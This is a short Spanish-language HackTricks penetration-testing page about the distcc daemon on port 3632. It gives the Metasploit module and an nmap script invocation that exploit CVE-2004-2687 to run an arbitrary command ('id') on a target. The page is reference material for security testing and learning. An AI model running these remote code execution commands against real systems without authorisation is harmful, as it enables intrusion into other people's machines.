hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.3 KiB

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Información Básica

Distcc es una herramienta que mejora el proceso de compilación al utilizar la potencia de procesamiento inactiva de otras computadoras en la red. Cuando distcc está configurado en una máquina, esta máquina es capaz de distribuir sus tareas de compilación a otro sistema. Este sistema receptor debe estar ejecutando el daemon distccd y debe tener un compilador compatible instalado para procesar el código enviado.

Puerto por defecto: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Explotación

Verifique si es vulnerable a CVE-2004-2687 para ejecutar código arbitrario:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

No creo que shodan detecte este servicio.

Resources

Post creado por Álex B (@r1p)

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}